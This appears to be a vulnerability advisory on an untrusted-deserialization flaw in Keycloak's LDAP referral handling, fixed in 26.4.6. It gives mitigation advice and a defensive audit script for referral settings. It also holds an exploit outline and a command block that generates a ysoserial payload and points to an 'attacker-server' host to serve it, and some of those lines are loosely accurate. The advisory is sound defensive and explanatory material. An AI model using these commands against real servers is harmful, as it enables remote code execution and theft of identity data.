An authenticated Keycloak realm administrator can configure an LDAP User Federation provider with a malicious LDAP server URL. The vulnerability is triggered when the administrator sets an LDAP referral that points to an attacker-controlled LDAP service. When Keycloak follows this configured referral during LDAP operations, it deserializes Java objects received from the untrusted server without proper validation. This deserialization of attacker-supplied data can lead to the execution of arbitrary code within the context of the Keycloak server process, ultimately allowing for full system compromise. The issue stems from insecure handling of Java serialized objects in the LDAP referral processing component.
Platform: Keycloak
Version: < 26.4.6
Vulnerability: Untrusted Deserialization
Severity: Moderate
Date: 2025-12-19
Prediction: 2025-12-19
What Undercode Says:
`curl -s https://api.github.com/repos/keycloak/keycloak/releases/latest | grep tag_name`
`java -jar ysoserial.jar CommonsCollections5 'id' > payload.ser`
`python3 -m http.server 1389`
`jndi://attacker-server:1389/payload.ser`
How Exploit:
- Attacker gains realm admin credentials (social engineering, compromise).
- Attacker configures a new LDAP provider in the Keycloak admin console.
- The LDAP server URL points to a malicious server controlled by the attacker.
- The malicious LDAP server is configured to return a referral (ref) pointing to another attacker-controlled service hosting a serialized Java payload (e.g., generated with ysoserial).
- When Keycloak interacts with this provider, it follows the referral and deserializes the malicious object, executing arbitrary code.
Protection from this CVE:
Upgrade to Keycloak version 26.4.6 or later. If immediate upgrade is impossible, apply the mitigation by disabling LDAP referrals in all LDAP user federation provider configurations across all realms via the admin console.
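Both checks above (is the running release at or past 26.4.6, and does any realm still have an LDAP provider that follows referrals) can be scripted against the Keycloak Admin REST API. The following is an added example written for this page, not code from the Keycloak project. It works on component representations as returned by `GET /admin/realms/{realm}/components?type=org.keycloak.storage.UserStorageProvider`; the config key `referral` with the values `follow`/`ignore` is assumed to be the one behind the "Referral" setting of the LDAP provider, and the sample data at the bottom is constructed for demonstration.

```python
"""Audit Keycloak realms for LDAP user-federation providers that follow referrals.

Added example, not Keycloak's own code. Assumptions (labelled):
  - component JSON has the shape of the Admin REST API ComponentRepresentation
    (keys: id, name, providerId, providerType, config)
  - the LDAP provider stores its referral setting under config["referral"]
    as a one-element list containing "follow" or "ignore"
"""
import json

USER_STORAGE_TYPE = "org.keycloak.storage.UserStorageProvider"
FIXED_VERSION = (26, 4, 6)  # advisory: versions below 26.4.6 are affected


def parse_version(tag: str) -> tuple:
    """Turn a release tag such as '26.4.6' or 'v26.4.6-rc1' into a comparable tuple."""
    core = tag.strip().lstrip("v").split("-")[0]
    return tuple(int(part) for part in core.split("."))


def is_fixed(tag: str) -> bool:
    """True when the given release tag is 26.4.6 or later."""
    return parse_version(tag) >= FIXED_VERSION


def follows_referrals(component: dict) -> bool:
    """True when the LDAP component is explicitly configured to follow referrals."""
    values = component.get("config", {}).get("referral", [])  # assumed key
    return any(str(v).lower() == "follow" for v in values)


def find_exposed(realm_components: dict) -> list:
    """Map {realm_name: [component, ...]} to a list of (realm, name, id)
    for every LDAP user-storage provider that follows referrals."""
    findings = []
    for realm, components in realm_components.items():
        for comp in components:
            if comp.get("providerType") != USER_STORAGE_TYPE:
                continue
            if comp.get("providerId") != "ldap":
                continue
            if follows_referrals(comp):
                findings.append((realm, comp.get("name"), comp.get("id")))
    return findings


def with_referrals_disabled(component: dict) -> dict:
    """Return a copy of the component with the referral setting forced to 'ignore'.
    The copy is what you would send back with
    PUT /admin/realms/{realm}/components/{id} (assumed endpoint)."""
    patched = json.loads(json.dumps(component))  # deep copy; leave the input untouched
    patched.setdefault("config", {})["referral"] = ["ignore"]
    return patched


# Constructed sample: two realms, one LDAP provider per realm, one following referrals.
SAMPLE = {
    "master": [
        {"id": "c-1", "name": "corp-ldap", "providerId": "ldap",
         "providerType": USER_STORAGE_TYPE,
         "config": {"connectionUrl": ["ldap://ldap.example.test"], "referral": ["follow"]}},
    ],
    "customers": [
        {"id": "c-2", "name": "partner-ldap", "providerId": "ldap",
         "providerType": USER_STORAGE_TYPE,
         "config": {"connectionUrl": ["ldaps://ldap2.example.test"], "referral": ["ignore"]}},
        {"id": "c-3", "name": "kerberos", "providerId": "kerberos",
         "providerType": USER_STORAGE_TYPE, "config": {}},
    ],
}

if __name__ == "__main__":
    for realm, name, cid in find_exposed(SAMPLE):
        print(f"realm={realm} provider={name} id={cid}: referrals followed, set to ignore")
    print("latest tag fixed:", is_fixed("26.4.6"))
```

In practice the `SAMPLE` dictionary is replaced by the JSON fetched per realm with an admin bearer token, and the dict returned by `with_referrals_disabled` is sent back as the PUT body; review the result in the admin console afterwards, since upgrading to 26.4.6 or later remains the actual fix.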
Impact:
Remote Code Execution (RCE) leading to full compromise of the Keycloak server and potentially the underlying host. Unauthorized access to all managed identities and authentication data.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode